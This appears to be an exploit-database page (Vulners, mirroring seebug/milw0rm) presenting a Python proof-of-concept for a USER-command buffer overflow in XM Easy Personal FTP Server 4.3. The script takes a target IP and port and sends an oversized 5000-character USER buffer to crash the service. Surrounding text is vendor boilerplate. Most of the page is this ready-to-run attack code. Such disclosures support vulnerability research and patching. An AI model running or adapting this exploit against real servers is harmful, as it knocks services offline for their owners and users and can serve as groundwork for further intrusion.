Lucene search
+L

XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 20 Views

XM Easy Personal FTP Server Buffer Overflow Po

Code

                                                ##############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# [email protected]                                          #
##############################################################

import socket
import struct
import time
import sys


buff=&#39;USER &#39;+&#39;A&#39;*5000+&#39;\r\n&#39;

if len(sys.argv)!=3:
	print &#34;[+] Usage: %s &#60;ip&#62; &#60;port&#62; \n&#34; %sys.argv[0]
	sys.exit(0)

try:
	
        print &#34;[+] Connecting to %s&#34; %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print &#34;[+] Sending Evil buffer&#34;
	time.sleep(1)
	s.send(buff)
        print &#34;[+] Service Crashed&#34;
        s.recv(1024)
	
except:
	print &#34;[+] Could Not Connect To ftp server&#34;

# milw0rm.com [2006-05-04]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
20